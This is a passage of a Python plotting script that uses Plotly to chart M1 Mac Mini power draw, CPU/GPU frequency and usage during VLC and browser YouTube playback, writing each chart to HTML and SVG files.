# bordercolor = "#FFF",
# borderwidth = 0.5
# )
# ])
# fig.add_annotation(text="Bar Mode:",
# xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
# x=0.89, y=1.25, showarrow=False, opacity=0.8, font=dict(size=13))
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.86, showarrow=False, font=dict(size=14, color='#707070'))
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average.svg")
# HORIZONTAL BAR CHART FOR Total Average
barDf = (dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, y='Video Type', x=['Package'], template='plotly_dark', orientation='h', hover_name = 'Video Type', width = 700, height = 250, #barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={"Package": "#57FFBC"},
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-VP9", "FHD-H264"]})
fig.update_xaxes(zeroline = True, title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_yaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{x:.0f} (mW)', texttemplate='%{x:.0f} mW', textfont= dict(size=11))
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.90,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 15, t = 60),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#181F26',
paper_bgcolor ='#181F26'
)
texts = [barDf['Package']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'inside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.17, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.165, y=1.099,
sizex=0.29, sizey=0.29,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average-total.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average-total.svg")
# Figure for CPU, GPU Frequency over time
fig = px.line(dfFrequency.loc[dfFrequency["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)", "time": "Time (s)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} MHz', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Frequency over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=0.83, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-frequency.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency.svg")
# BAR CHART FOR Averages by component
barDf = (dfFrequency.loc[dfFrequency["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 1650])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (Hz)', texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Frequency</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.96, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-frequency-average.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency-average.svg")
# Figure for CPU, GPU Usage over time
fig = px.line(dfUsage.loc[dfUsage["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence= px.colors.sequential.Burgyl,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)", "time": "Time (s)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', ticksuffix = "%")
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y:.0f} %', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Usage over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=0.9, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-usage.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage.svg")
# BAR CHART FOR Averages by component
barDf = (dfUsage.loc[dfUsage["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 29], ticksuffix = "%")
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (%)', texttemplate='%{y:.0f} %', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Usage</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.96, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-usage-average.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage-average.svg")
def buildYouTubeCharts(dfPower, dfFrequency, dfUsage, config, kLogo):
dfPower["Video Type"].replace({'4K-VP9':'VLC-SW', "Chrome-HW-YT-4K":"Chrome-HW", "Safari-HW-YT-4K":"Safari-HW"}, inplace=True)
dfFrequency["Video Type"].replace({'4K-VP9':'VLC-SW', "Chrome-HW-YT-4K":"Chrome-HW", "Safari-HW-YT-4K":"Safari-HW"}, inplace=True)
dfUsage["Video Type"].replace({'4K-VP9':'VLC-SW', "Chrome-HW-YT-4K":"Chrome-HW", "Safari-HW-YT-4K":"Safari-HW"}, inplace=True)
# Figure for Package Power Over Time
fig = px.area(dfPower.loc[dfPower["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])], x='time', y=['Package'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", facet_col_wrap = 5,
labels={"value": "Power Consumption (mW)", "time": "Time (s)"}, color_discrete_map={"Package": "#57FFBC"},
category_orders={"Video Type": ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_layout(autosize = True, hovermode="x",
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Total Package Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.05, y=1.3, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.17,
sizex=0.2, sizey=0.2,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-power-package-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-package-browser.svg")
# Figure for Total Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark',
width = 700, height = 900, facet_row='Video Type', line_shape= "spline", render_mode = "svg",
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence=px.colors.sequential.YlOrRd,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Power Consumption (mW)", "time": "Time (s)"},
category_orders={"Video Type": ["VLC-SW", "Chrome-SW", "Safari-HW", "Chrome-HW"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
# print(annotation)
annotation['textangle'] = 0
annotation['xanchor'] = 'right'
annotation['x'] = annotation['x'] - 0.002
annotation['y'] = annotation['y'] + 0.038
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=13)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
# fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_traces(hovertemplate='%{y} (mW)')
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.97,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'left', yanchor = 'top',
x=0.85, y=0.75, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.04,
sizex=0.067, sizey=0.067,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-total-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-total-browser.svg")
# BAR CHART FOR Averages by component
barDf = (dfPower.loc[dfPower["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 400, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 1100])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (mW)', texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.11, 0.11, 0.11, 0.11, 0.11])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.93,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['DRAM'], barDf['GPU'], barDf['Other']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.86, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.12,
sizex=0.145, sizey=0.145,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average-browser.svg")
# HORIZONTAL BAR CHART FOR Total Average
barDf = (dfPower.loc[dfPower["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, y='Video Type', x=['Package'], template='plotly_dark', orientation='h', hover_name = 'Video Type', width = 700, height = 250, #barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={"Package": "#57FFBC"},
# color_discrete_map={
# "Efficiency Cluster": "#9D788C",
# "Performance Cluster": "#2A9D8F",
# "DRAM": "#E9C46A",
# "GPU": "#F4A261",
# # "Other": "rgb(95, 70, 144)"
# "Other": "#E76F51"
# },
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["Safari-HW", "Chrome-HW", "Chrome-SW", "VLC-SW"]})
fig.update_xaxes(zeroline = True, title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_yaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{x:.0f} (mW)', texttemplate='%{x:.0f} mW', textfont= dict(size=11))
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.90,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 15, t = 60),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Package']]
for i, t in enumerate(texts):
print('i = ', i,'t= ' ,t)
fig.data[i].text = t
fig.data[i].textposition = 'inside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=1, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.18, y=1.099,
sizex=0.29, sizey=0.29,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average-total-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average-total-browser.svg")
# Figure for CPU, GPU Frequency over time
fig = px.line(dfFrequency.loc[dfFrequency["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)", "time": "Time (s)"},
category_orders={"Video Type": ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} MHz', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Frequency over Time</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1.05, y=1.3, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-frequency-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency-browser.svg")
# Average Frequency
barDf = (dfFrequency.loc[dfFrequency["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)"},
category_orders={"Video Type": ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 1650])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (Hz)', texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Frequency</b> <br> <sup> Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=1.25, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-frequency-average-browser.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency-average-browser.svg")
# Figure for CPU, GPU Usage over time
fig = px.line(dfUsage.loc[dfUsage["Video Type"].isin(["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence= px.colors.sequential.Burgyl,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)", "time": "Time (s)"},
category_orders={"Video Type": ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', ticksuffix = "%")
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y:.0f} %', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
